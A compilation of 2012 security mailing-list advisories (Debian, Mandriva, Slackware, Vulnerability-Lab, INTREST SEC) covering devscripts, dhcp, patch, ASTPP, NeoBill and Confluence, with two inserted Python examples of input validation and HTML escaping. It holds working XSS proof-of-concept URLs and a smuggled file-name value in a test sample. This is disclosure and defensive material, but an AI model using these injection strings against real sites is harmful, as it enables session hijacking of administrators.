[SECURITY] [DSA 2480-4] request-tracker3.8 regression update
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2480-4                   secur...@debian.org
http://www.debian.org/security/                          Raphael Geissert
September 15, 2012                     http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : request-tracker3.8
Vulnerability  : regression
Debian-specific: no

The security updates for request-tracker3.8, DSA-2480-1, DSA-2480-2, and
DSA-2480-3, contained minor regressions. Namely:

* The calendar popup page in Internet Explorer would be blocked by the
  CSRF protection mechanism.

* Search results pages could not be shared without saving, sharing, and
  then loading the search.

* rt-email-dashboards would fail with an error due to a call to an
  undefined interp method.

Please note that if you run request-tracker3.8 under the Apache web
server, you must stop and start Apache manually. The restart mechanism
is not recommended, especially when using mod_perl.

For the stable distribution (squeeze), this problem has been fixed in
version 3.8.8-7+squeeze5.

We recommend that you upgrade your request-tracker3.8 packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlBUw7kACgkQYy49rUbZzloRmgCfRWU98a5Ug1c5HSGr9ltpRo17
hU8An0wDUZTxSnOEuHfScdRcmuCYB1aW
=BaTL
-----END PGP SIGNATURE-----
[SECURITY] [DSA 2549-1] devscripts security update
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2549-1                   secur...@debian.org
http://www.debian.org/security/                          Raphael Geissert
September 15, 2012                     http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : devscripts
Vulnerability  : multiple
Problem type   : local (remote)
Debian-specific: no
CVE ID         : CVE-2012-2240 CVE-2012-2241 CVE-2012-2242 CVE-2012-3500

Multiple vulnerabilities have been discovered in devscripts, a set of
scripts to make the life of a Debian Package maintainer easier. The
following Common Vulnerabilities and Exposures project ids have been
assigned to identify them:

CVE-2012-2240:
    Raphael Geissert discovered that dscverify does not perform
    sufficient validation and does not properly escape arguments to
    external commands, allowing a remote attacker (as when dscverify is
    used by dget) to execute arbitrary code.

CVE-2012-2241:
    Raphael Geissert discovered that dget allows an attacker to delete
    arbitrary files when processing a specially-crafted .dsc or .changes
    file, due to insufficient input validation.

CVE-2012-2242:
    Raphael Geissert discovered that dget does not properly escape
    arguments to external commands when processing .dsc and .changes
    files, allowing an attacker to execute arbitrary code. This issue is
    limited with the fix for CVE-2012-2241, and had already been fixed in
    version 2.10.73 due to changes to the code, without considering its
    security implications.

CVE-2012-3500:
    Jim Meyering, Red Hat, discovered that annotate-output determines the
    name of temporary named pipes in a way that allows a local attacker
    to make it abort, leading to denial of service.

Additionally, a regression in the exit code of debdiff introduced in
DSA-2409-1 has been fixed.

For the stable distribution (squeeze), these problems have been fixed in
version 2.10.69+squeeze4.

For the testing distribution (wheezy), these problems will be fixed soon.

For the unstable distribution (sid), these problems will be fixed in
version 2.12.3.

We recommend that you upgrade your devscripts packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlBUxE4ACgkQYy49rUbZzlpq0ACfaegRy0LXMZmnnJ/fwi2PH1iB
5XcAnjbRtMlPy1+PASvWy4/DI+Zm3PuR
=VmvQ
-----END PGP SIGNATURE-----
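The two defects the DSA-2549-1 advisory above describes in dget and dscverify (file names taken from a .dsc reaching the filesystem unvalidated, and those names being interpolated into external command lines) share one fix pattern: allow-list the file name, then hand it to the external tool as a single argv element with no shell in between. The block below is an added illustration of that pattern in Python; it is not devscripts code (dget and dscverify are Perl scripts) and the .dsc fragment, the `SAFE_NAME` character class and the `verify_argv` helper are constructed for this example. The advisory does not state how the crafted .dsc caused file deletion; the example assumes the generic hazard of a directory component in the Files: field.

```python
import re
import subprocess
import sys

# Constructed sample .dsc fragment (not a real package). The third entry in
# Files: carries a directory component and shell metacharacters of the kind
# a maintainer tool must never hand to the filesystem or to a shell.
SAMPLE_DSC = """\
Format: 1.0
Source: example
Version: 1.0-1
Files:
 d41d8cd98f00b204e9800998ecf8427e 0 example_1.0.orig.tar.gz
 d41d8cd98f00b204e9800998ecf8427e 0 example_1.0-1.diff.gz
 d41d8cd98f00b204e9800998ecf8427e 0 ../evil;touch-pwned.tar.gz
"""

# Allow-list for a file listed in a .dsc: a bare name built from the
# characters Debian package file names use. No slash means no directory
# part; no leading dot keeps "." and ".." out without a special case.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._+~-]*$")


def parse_files_field(dsc_text):
    """Return (md5, size, name) triples from the Files: field of a .dsc.
    The field is a multi-line continuation: each following line that starts
    with a space is one entry, and the first non-indented line ends it."""
    entries = []
    in_files = False
    for line in dsc_text.splitlines():
        if line.startswith("Files:"):
            in_files = True
            continue
        if in_files:
            if not line.startswith(" "):
                break
            md5, size, name = line.split()
            entries.append((md5, int(size), name))
    return entries


def is_safe_filename(name):
    """True only for a bare name matching the allow-list. Deliberately stricter
    than legitimate packages need: an allow-list of characters, not a deny-list
    of the metacharacters one happens to remember."""
    return SAFE_NAME.match(name) is not None


def safe_entries(dsc_text):
    """Parse the Files: field and keep only entries whose name passes the check,
    so a crafted entry can neither name a file outside the working directory
    (cf. CVE-2012-2241) nor smuggle shell syntax (cf. CVE-2012-2240/2242)."""
    return [e for e in parse_files_field(dsc_text) if is_safe_filename(e[2])]


def verify_argv(tool, name):
    """Build the argument vector for an external tool (hypothetical helper).
    The name is validated first and then becomes exactly one argv element;
    there is no shell on the path and therefore no quoting to get wrong."""
    if not is_safe_filename(name):
        raise ValueError("refusing to pass unsafe file name to %s: %r" % (tool, name))
    return [tool, "--", name]


def argv_roundtrip(name):
    """Show that a list-form subprocess call delivers an argument verbatim.
    The child is the Python interpreter itself (so no external tool is
    needed); it echoes argv[1], and metacharacters come back untouched
    instead of being interpreted the way a shell would."""
    child = [sys.executable, "-c", "import sys; sys.stdout.write(sys.argv[1])", name]
    return subprocess.run(child, capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    for md5, size, name in safe_entries(SAMPLE_DSC):
        print("accepted:", name, verify_argv("gpg", name))
    print("echoed verbatim by the child:", argv_roundtrip("a b;$(c)"))
```

Both layers matter: the allow-list is what stops a crafted entry from naming a path outside the working directory, and the argv form is what makes the command-line escaping problem disappear rather than merely harder to trigger.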
[ MDVSA-2012:153 ] dhcp
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2012:153
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : dhcp
 Date    : September 16, 2012
 Affected: Enterprise Server 5.0
 _______________________________________________________________________

 Problem Description:

 A security issue was identified and fixed in dhcp:

 ISC DHCP 4.1.x before 4.1-ESV-R7 and 4.2.x before 4.2.4-P2 allows remote
 attackers to cause a denial of service (daemon crash) in opportunistic
 circumstances by establishing an IPv6 lease in an environment where the
 lease expiration time is later reduced (CVE-2012-3955).

 The updated packages have been patched to correct this issue.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3955
 https://kb.isc.org/article/AA-00779
 _______________________________________________________________________

 Updated Packages:

 Mandriva Enterprise Server 5:
 d7c53f0bdfb976d7e391ab03ba330f0a  mes5/i586/dhcp-client-4.1.2-0.8mdvmes5.2.i586.rpm
 7114cd0bd9181450e7f870eaecf78b71  mes5/i586/dhcp-common-4.1.2-0.8mdvmes5.2.i586.rpm
 92489f461fb0409f741250572dcd32f9  mes5/i586/dhcp-devel-4.1.2-0.8mdvmes5.2.i586.rpm
 d1e62d5ecc85bce8925187ee43bf7fd4  mes5/i586/dhcp-doc-4.1.2-0.8mdvmes5.2.i586.rpm
 01700c9011875ed4e3f3fee02f1f7d46  mes5/i586/dhcp-relay-4.1.2-0.8mdvmes5.2.i586.rpm
 78f3dfa78a3258ae3fb6e7364819f173  mes5/i586/dhcp-server-4.1.2-0.8mdvmes5.2.i586.rpm
 3ef70d584592f7c1fcfbc5370d4199cb  mes5/SRPMS/dhcp-4.1.2-0.8mdvmes5.2.src.rpm

 Mandriva Enterprise Server 5/X86_64:
 df0e98aa316894f3ca9d846573ea811d  mes5/x86_64/dhcp-client-4.1.2-0.8mdvmes5.2.x86_64.rpm
 2cfc9181bc5f260063a5978b610af003  mes5/x86_64/dhcp-common-4.1.2-0.8mdvmes5.2.x86_64.rpm
 d8c41be05d8506e3ce65f7f501510682  mes5/x86_64/dhcp-devel-4.1.2-0.8mdvmes5.2.x86_64.rpm
 1a875506e6b6e686f75496560e0560ac  mes5/x86_64/dhcp-doc-4.1.2-0.8mdvmes5.2.x86_64.rpm
 1c2ddd51c919b480daf912ed59eadcd2  mes5/x86_64/dhcp-relay-4.1.2-0.8mdvmes5.2.x86_64.rpm
 5b7b0f32cf2e834c68021620c93515a0  mes5/x86_64/dhcp-server-4.1.2-0.8mdvmes5.2.x86_64.rpm
 3ef70d584592f7c1fcfbc5370d4199cb  mes5/SRPMS/dhcp-4.1.2-0.8mdvmes5.2.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi. The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security. You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)

iD8DBQFQVX4JmqjQ0CJFipgRAu+KAJ9/13Mqxb0vf1Y6Gn1f3I5w9SgwTQCZAUwF
hJHvnBtt4jQR4CKYQsJXGsg=
=a7nw
-----END PGP SIGNATURE-----
[SECURITY] [DSA 2548-1] Debian Security Team PGP/GPG key change notice
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2548-1                   secur...@debian.org
http://www.debian.org/security/                                Nico Golde
September 13, 2012                     http://www.debian.org/security/faq
- -------------------------------------------------------------------------

This is a notice to inform you that our previous PGP/GPG key expired.

The fingerprint of the *old* key is:
  2764 4A76 61FD 9614 BCD6 844F 370E 2BFC 68B6 4E0D

The *new* key fingerprint is:
  BACB 4B5C 30AC 38F3 19EE 961E 2702 CAEB 90F8 EEC5

Please use the new key from now on for encrypted communication with the
Debian Security Team. Please obtain the new key from a keyserver, e.g.,
http://pgp.surfnet.nl/pks/lookup?op=vindexsearch=0xBACB4B5C30AC38F319EE961E2702CAEB90F8EEC5

Our website will be updated shortly to reflect this change.

Further information is available at http://www.debian.org/security/.

Mailing list: debian-security-annou...@lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlBRtmgACgkQHYflSXNkfP+ulgCfa4SEWA+rgujISyAWF22eveAx
PT4An20bkhJOeoUMRV+LMLibpXhdQyEi
=BO8T
-----END PGP SIGNATURE-----
ipv6mon v1.0 released! (IPv6 address monitoring daemon)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Folks,

We are pleased to announce the release of ipv6mon v1.0!

** Description **

ipv6mon (http://www.si6networks.com/tools/ipv6mon) is a tool for
monitoring IPv6 address usage on a local network. It is meant to be
particularly useful in networks that employ IPv6 Stateless Address
Auto-Configuration (as opposed to DHCPv6), where address assignment is
decentralized and there is no central server that records which IPv6
addresses have been assigned to which nodes during which period of time.

ipv6mon employs active probing to discover IPv6 addresses in use, and
determine whether such addresses remain active.

** Latest release **

The latest release of ipv6mon is v1.0, and is available at:
http://www.si6networks.com/tools/ipv6mon/ipv6mon-v1.0.tar.gz

** Documentation **

PDF versions of the ipv6mon manuals are available on-line at:
http:://www.si6networks.com/tools/ipv6mon

** GIT repository **

The GIT repository for the ipv6mon is:
https://github.com/fgont/ipv6-toolkit.git

** IPv6 security trainings **

Development of ipv6mon is partially supported through our IPv6 security
trainings. Please consider attending one of our upcoming trainings:
http://www.hackingipv6networks.com/upcoming-t

Follow us on twitter: @SI6Networks

Best regards,
- --
Fernando Gont
SI6 Networks
e-mail: fg...@si6networks.com
PGP Fingerprint: 31C6 D484 63B2 8FB1 E3C4 AE25 0D55 1D4E 7492
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)

iQIcBAEBAgAGBQJQUc5sAAoJEK4lDVUdTnSSAh0P/RrAyh1+ZfLVT3poHUGQ/B+M
OpJ5X+nJijmoCmgBkpr6ffj8eVB1wqIRgmw/Y/7DlgVK1+ZGYhl5wwgMNGfTiSfS
hLtNjtSc6YRXxLXEYhfXaGN4SNy70ExD3fB+PTtqbyAcuuaIqx7iAwQmhkXCv8gK
RnSEE+DuGn0M/+9RUEjEcAZIf/rfyRy612VhDR791HoL79p8yqK962tLbKpTFBdt
dmd8UFv3tuaVkmBsUmqN/8zuB7+IpwH9x88mRZeD4F/JLAMSwl9cZ17n5MIODUrg
AWU9JcXKIKY0XfmdM6EEYrqLtE/o2Ea8R6IXuQgPb04v/q/WAh3E8LXN/AwtFW/4
6l9gL2PhmFBp5BnGjpay9sZZ+HdcKOugwnTFZNqxWd+FLulk/zqW7SWmvyUZ+8B1
P0QRmXfPrDqeztBEeZunS99XsuTMShct/bauVg0aTxO9KJcb3JJhnRsKqoadpLQd
QE87EEcolRh5Hpxm2ixS9sjs3yAvtHx9iSIrZBcYZKHr2gp44d4oIk2zlqmZiw36
m3jpPTd3CRiIVmQjJZShu4kyj5/cKQqc8hZhlUNC4Nx0EfPmCKPpHyP31IsO9xcd
CEIVo7vzJeq7sZcniacx6ZgrCyFuhZdzhklfd6aX9ncex12smQZrOJuLuX2DF+ty
fmU9dFafK7ig5rGdoQxB
=HTY+
-----END PGP SIGNATURE-----
ASTPP VoIP Billing (4cf207a) - Multiple Web Vulnerabilities
Title:
======
ASTPP VoIP Billing (4cf207a) - Multiple Web Vulnerabilities

Date:
=====
2012-08-17

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=687

VL-ID:
=====
687

Common Vulnerability Scoring System:
====================================
4

Introduction:
=============
ASTPP is a billing solution for Freeswitch and Asterisk. It supports
pre-paid and post-paid billing with call rating and credit control. It
also provides many other features such as calling cards, least cost
routing (LCR), did management, resellers, callbacks, etc. ...

Customer Account Features
Reseller Support
Call Rating Capabilities
Least Cost Failover Routing
Credit Control
DID Mapping
Automated Account Device Management Authentication
Calling Cards
Vendor Billing
Asterisk -Real-time Support

ASTPP is able to integrate with OSCommerce to provide a Web store for
your users to purchase calling cards and sign up for VoIP accounts. We
also support multiple currency for each account type with real-time
update using Yahoo Finance (http://finance.yahoo.com/currency-converter).

(Copy of the Vendor Homepage: http://www.astpp.org/ )

Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple persistent
web vulnerabilities in the ASTPP VoIP (4cf207a) phone billing web
application.

Report-Timeline:
================
2011-08-17: Public Disclosure

Status:
========
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
High

Details:
========
Multiple persistent input validation vulnerabilities are detected in the
ASTPP VoIP (4cf207a) phone billing web application. The web
vulnerabilities allow remote attackers to implement/inject malicious
script code on the application side (persistent).

The first persistent web vulnerability is located in the user management
(admin) module with the bound vulnerable firstname, lastname and company
parameters. The first vulnerability can easily be exploited by customers
to execute script code out of the administrator user management module
(backend). The customer can register with the malicious values or change
the vulnerable values via update profile after successful registration
with a non-malicious user.

The second and third vulnerabilities are located in the add dids and add
trunks module with the bound vulnerable access number, note, trunk name
and dialed number mods parameters. The 4th persistent vulnerability is
located in the Taxes - Tax Information modules with the bound vulnerable
priority and description application parameters.

Successful exploitation of the vulnerabilities can lead to session
hijacking (manager/admin) or stable (persistent) context manipulation.
Exploitation requires low user interaction and a low privileged web
application user account.

Vulnerable Module(s):
    [+] Account Management
    [+] DIDs - Add New Your Own DIDs
    [+] Trunks - Add Trunks
    [+] Taxes - Tax Information

Vulnerable Parameter(s):
    [+] Firstname, Lastname, Company
    [+] Access Number, Note
    [+] Trunk Name, Dialed Number Mods - Actions
    [+] Priority, Description

Affected Section(s):
    [+] Account Listing - Actions
    [+] DIDs - Edit Mask Listing
    [+] Trunks Listing (Management)
    [+] Tax - Edit Mask Listing

Proof of Concept:
=================
The persistent vulnerabilities can be exploited by a remote attacker with
a low privileged user account and with low required user interaction.
For demonstration or reproduce ...

Review: Account Management - User Account Listing

div style=text-align: center; width: 90px; white-space: normal;div style=text-align: center; width: 90px; white-space: normal;venky/div/div/td
td align=centerdiv style=text-align: center; width: 90px; white-space: normal;div style=text-align: center; width: 90px; white-space: normal; /div/div/td
td align=centerdiv style=text-align: center; width: 90px; white-space: normal;div style=text-align: center; width: 90px; white-space: normal;[PERSISTENT INJECTED SCRIPT CODE] /div/div/td
td align=centerdiv style=text-align: center; width: 90px; white-space: normal;div style=text-align: center; width: 90px; white-space: normal;[PERSISTENT INJECTED SCRIPT CODE]/div/div/td
td align=rightdiv style=text-align: right; width: 70px; white-space: normal;div style=text-align: right; width: 70px; white-space: normal;0. USD/div/div/td
td align=rightdiv style=text-align: right; width: 70px; white-space: normal;div style=text-align: right; width: 75px; white-space: normal;0. USD/div/div/td
td align=centerdiv style=text-align: center; width: 70px; white-space:
NeoBill CMS v0.8 Alpha - Multiple Web Vulnerabilities
Title:
======
NeoBill CMS v0.8 Alpha - Multiple Web Vulnerabilities

Date:
=====
2012-08-18

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=685

VL-ID:
=====
685

Common Vulnerability Scoring System:
====================================
3.5

Introduction:
=============
NeoBill is a web-based Customer Management and Billing solution designed
for web hosting providers, particularly hosting resellers. It is
developed in PHP, uses MySQL as the backend database, and is licensed
under the GPL. The script supports independent payment gateways, and
registrars of domain names.

Key features of the product:

* Open source (GPL)
* Support for PHP4 and PHP5
* Use MySQL database
* Independent Payment Gateways Module
* Independent Domain Registrar Module
* Multi-user system
* The ability to integrate third-party modules
* Using Smarty templates
* Checking the active, inactive and pending accounts
* Attachments to the memos Account
* Sending predefined e-mail'ov for new customers
* Creating and editing accounts, which can be printed or sent by mail to
  its customers
* Accounts can be generated by one or all at once
* Payments
* Set one-time and monthly payments for each service / service
* Services have a duration of 1,3,6 and 12 months
* Domain registration through API Directi

(Copy of the Vendor Homepage: http://www.neobill.net/ )

Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple web
vulnerabilities in the NeoBill v0.8 Alpha Content Management System.

Report-Timeline:
================
2012-08-19: Public or Non-Public Disclosure

Status:
========
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
High

Details:
========
1.1
A persistent input validation vulnerability is detected in the NeoBill
v0.8 Alpha Content Management System. The vulnerability allows remote
attackers or a local low privileged user account to inject/implement
malicious persistent script code on the application side of the neobill
v0.8 web application.

The vulnerability is located in the user account module with the bound
vulnerable contactname or username parameters. Attackers can inject
malicious persistent script codes as companyname and username via
register account or update profile. The code will be executed
persistently in the administration backend when processing or watching
the user account listings.

Successful exploitation of the vulnerability results in persistent
session hijacking attacks, persistent phishing requests or stable
persistent module context manipulation.

Vulnerable Module(s):
    [+] User Accounts - Management [Admin Backend]

Vulnerable Parameter(s):
    [+] Contactname
    [+] Username

1.2
Multiple client side cross site scripting vulnerabilities are detected
in the NeoBill v0.8 Alpha Content Management System. The vulnerability
allows a remote attacker to manipulate client side application requests
with medium or high required user interaction.

The vulnerabilities are located in the unsanitized output of the
Uncaught SWException and Invalid Object Exception web application
modules.

Successful exploitation of the vulnerability results in client side
session hijacking, non-persistent phishing requests or non-persistent
module context manipulation.

Vulnerable Module(s):
    [+] 2 x Exception Handling

Vulnerable Parameter(s):
    [+] Uncaught SWException Handling
    [+] Invalid Object Exception Handling

Proof of Concept:
=================
1.1
The persistent web vulnerability can be exploited by a remote attacker
with a low privileged application user account and low required user
interaction. For demonstration or reproduce ...

Review: Listing - Contactname Username

tr td a href=http://neobill.127.0.0.1:1339/neobill/manager/manager_content.php?page=config_edit_useruser=admin;admin/a /td
td Administrator /td
td admin admin [PERSISTENT INJECTED SCRIPT CODE!])' = td= td a href=mailto:sy...@neobill.servertest.de;sy...@neobill.servertest.de/a /td

Affected User Account - Listing:
http://neobill.127.0.0.1:1339/neobill/manager/manager_content.php?page=config_edit_useruser=admin
http://neobill.127.0.0.1:1339/neobill/manager/manager_content.php?page=config_users

1.2
The non-persistent cross site scripting vulnerabilities can be exploited
by remote attackers without a low privileged application user account,
with medium or high required user interaction. For demonstration or
reproduce ...

Exception Handling - Uncaught SWException, Invalid Object Exception

neobill.127.0.0.1:1339/neobill/manager/manager_content.php?page=%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VLABS%22%29%20%3C
[INTREST SEC] Atlassian Confluence Wiki XSS Vulnerability
--- INTREST SEC | Security Advisory ---

Product:             Confluence Wiki
Vendor:              Atlassian (www.atlassian.com)
Vulnerability Type:  Cross Site Scripting (XSS)
Risk Level:          High (classified by vendor)
Discovered by:       INTREST SEC - NID
Public Disclosure:   2012/09/12
Vendor Notification: 2012/02/07
Tested Versions:     3.5.9, 4.0.3, 4.1.4
CVSS Score:          7.5

## Details

Atlassian Confluence is described as "Collaboration tool for teams to
create, share, and discuss rich content - docs, files, ideas, specs,
diagrams, mockups, anything." (www.atlassian.com)

## Description

A security vulnerability within Atlassian Confluence Wiki has been
identified. It is remotely exploitable and based on the CWE-79 family
Cross-Site-Scripting (XSS).

Confluence allows input passed in the URL to be injected into the HTML
structure of an error-page in an unsafe and unsanitized way. Therefore
it is possible to inject non-persistent JavaScript code. This
vulnerability does not require authentication of the victim and can
easily be exploited by manipulating the GET request.

## Proof of Concept

The following URL triggers the XSS by including
IFRAME SRC=javascript:alert('XSS') into the error page:

http://localhost:8090/pages/includes/status-list-mo%3CIFRAME%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E.vm

## Solution

According to the vendor, upgrade to Confluence 4.1.9 or later.

## References

[1] Atlassian Security Advisory
    https://confluence.atlassian.com/display/DOC/Confluence+Security+Advisory+2012-09-11

## Time Table

[2012/02/07] Informed vendor about the vulnerability via ticketing system
[2012/02/08] Informed vendor that Atlassian JIRA (at least 4.4.3 and 4.4.4) is also infected
[2012/02/09] Vendor created a ticket for JIRA vulnerability
[2012/02/09] Vendor response: JIRA problem already known. The fix should be available in JIRA 5.0 or 5.0.1
[2012/03/21] Vendor tagged ticket as fixed.
[2012/04/02] Asked vendor about things like patch release date, requesting a CVE number, releasing an advisory
[2012/04/03] Vendor response: No dedicated Patch; Version 4.1.9 has been released; no CVE will be requested by vendor
[2012/08/27] Vendor defined advisory release date to 2012/09/11
[2012/08/27] Informed vendor about additional advisory release through INTREST SEC
[2012/09/11] Vendor released advisory
[2012/09/13] INTREST SEC released advisory

--
INTREST SEC
Intelligent Information Security
---
Kommunalstrasse 15 - A-4020 Linz - Austria
Tel. +43 (0) 732 / 341 060
Fax. +43 (0) 732 / 341 060 - 20
researchlab [at] intrest.at | www.intrest-sec.com
---
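The three web advisories above (ASTPP, NeoBill and Confluence) are all instances of one defect: a value under user control is concatenated into HTML without output encoding. The first two are stored (profile fields rendered in an admin listing), the third is reflected (a request path echoed into an error page). The block below is an added Python illustration of the unsafe rendering pattern beside its hardened form; it is not code from any of the three products (ASTPP and NeoBill are PHP, Confluence is Java), and the sample account, the sample request path and the `user_markup_survives` self-check are constructed for this example.

```python
import html
from urllib.parse import unquote

# Constructed sample values of the two kinds the advisories describe: profile
# fields that are stored and later shown to an administrator, and a request
# path that is reflected into an error page. They carry harmless markup only;
# the point is that none of it may reach the page as live HTML.
SAMPLE_ACCOUNT = {
    "contact_name": '"><b>injected</b>',
    "username": "alice",
    "email": "alice@example.invalid",
}
SAMPLE_ERROR_PATH = "/pages/includes/status-list-mo%3Cb%3Einjected%3C/b%3E.vm"

ROW_TEMPLATE = "<tr><td>%(contact_name)s</td><td>%(username)s</td><td>%(email)s</td></tr>"
ERROR_TEMPLATE = "<h1>Page not found</h1><p>No such page: %s</p>"


def render_account_row_unsafe(account):
    """The pattern the ASTPP and NeoBill advisories describe: the fields are
    concatenated into the listing verbatim, so markup stored in a profile
    field becomes part of the page every administrator who opens it views."""
    return ROW_TEMPLATE % account


def render_account_row(account):
    """Hardened form: every untrusted field is HTML-escaped before it is
    concatenated. quote=True also encodes quotes, so the same value is safe
    inside an attribute, not only between tags."""
    safe = {key: html.escape(value, quote=True) for key, value in account.items()}
    return ROW_TEMPLATE % safe


def render_error_page(requested_path):
    """Reflected case, as in the Confluence error page: the requested path is
    percent-decoded (as the server would decode it) and then escaped before
    it is echoed back. Escaping must happen after decoding, never before."""
    shown = html.escape(unquote(requested_path), quote=True)
    return ERROR_TEMPLATE % shown


def user_markup_survives(rendered):
    """Self-check used by the test: remove the tags the templates themselves
    emit; any '<' still present came from user data and would be live markup."""
    template_tags = ("<tr>", "</tr>", "<td>", "</td>", "<h1>", "</h1>", "<p>", "</p>")
    stripped = rendered
    for tag in template_tags:
        stripped = stripped.replace(tag, "")
    return "<" in stripped


if __name__ == "__main__":
    print("unsafe :", render_account_row_unsafe(SAMPLE_ACCOUNT))
    print("escaped:", render_account_row(SAMPLE_ACCOUNT))
    print("error  :", render_error_page(SAMPLE_ERROR_PATH))
```

The escaped output still displays the original characters to the administrator, so nothing is lost; the browser simply never parses them as tags. A templating engine that escapes by default achieves the same thing without relying on each call site to remember it.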
[slackware-security] patch (SSA:2012-257-02)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[slackware-security]  patch (SSA:2012-257-02)

New patch packages are available for Slackware 12.1, 12.2, 13.0, 13.1,
13.37, and -current to fix a security issue.

Here are the details from the Slackware 13.37 ChangeLog:
+--------------------------+
patches/packages/patch-2.7-i486-1_slack13.37.txz:  Upgraded.
  This version of patch ignores destination filenames that are absolute or
  that contain a component of "..", unless such a filename is provided as
  an argument.
  For more information, see:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4651
  (* Security fix *)
+--------------------------+

Where to find the new packages:
+-----------------------------+

Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project!  :-)

Also see the "Get Slack" section on http://slackware.com for
additional mirror sites near you.

Updated package for Slackware 12.1:
ftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/patch-2.7-i486-1_slack12.1.tgz

Updated package for Slackware 12.2:
ftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/patch-2.7-i486-1_slack12.1.tgz

Updated package for Slackware 13.0:
ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/patch-2.7-i486-1_slack13.0.txz

Updated package for Slackware x86_64 13.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/patch-2.7-x86_64-1_slack13.0.txz

Updated package for Slackware 13.1:
ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/patch-2.7-i486-1_slack13.1.txz

Updated package for Slackware x86_64 13.1:
ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/patch-2.7-x86_64-1_slack13.1.txz

Updated package for Slackware 13.37:
ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/patch-2.7-i486-1_slack13.37.txz

Updated package for Slackware x86_64 13.37:
ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/patch-2.7-x86_64-1_slack13.37.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/patch-2.7-i486-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/patch-2.7-x86_64-1.txz

MD5 signatures:
+-------------+

Slackware 12.1 package:
ebe093df28fc95c594af368597bf7262  patch-2.7-i486-1_slack12.1.tgz

Slackware 12.2 package:
f39f3ce8bbba509b7e266b6c8c9dcf47  patch-2.7-i486-1_slack12.1.tgz

Slackware 13.0 package:
e8404d45a3b51f8a7ad67efedfb488d9  patch-2.7-i486-1_slack13.0.txz

Slackware x86_64 13.0 package:
90d8b1e9237fe5080bd56a42de14d554  patch-2.7-x86_64-1_slack13.0.txz

Slackware 13.1 package:
f0fdc8a64eb8051527e9854ea9adba72  patch-2.7-i486-1_slack13.1.txz

Slackware x86_64 13.1 package:
60c3b0f3d1bc49b7e0140cbe65114560  patch-2.7-x86_64-1_slack13.1.txz

Slackware 13.37 package:
e70793008f94ef1f7f39b5e444bce6eb  patch-2.7-i486-1_slack13.37.txz

Slackware x86_64 13.37 package:
6fc457dbe6d32fd747336eb271a49c08  patch-2.7-x86_64-1_slack13.37.txz

Slackware -current package:
95134353a77428529c66f801f405bc05  a/patch-2.7-i486-1.txz

Slackware x86_64 -current package:
e0128639a440509600c060f2cd1e0530  a/patch-2.7-x86_64-1.txz

Installation instructions:
+------------------------+

Upgrade the package as root:
# upgradepkg patch-2.7-i486-1_slack13.37.txz

+-----+

Slackware Linux Security Team
http://slackware.com/gpg-key
secur...@slackware.com

+------------------------------------------------------------------------+
| To leave the slackware-security mailing list:                          |
+------------------------------------------------------------------------+
| Send an email to majord...@slackware.com with this text in the body of |
| the email message:                                                     |
|                                                                        |
|   unsubscribe slackware-security                                       |
|                                                                        |
| You will get a confirmation message back containing instructions to    |
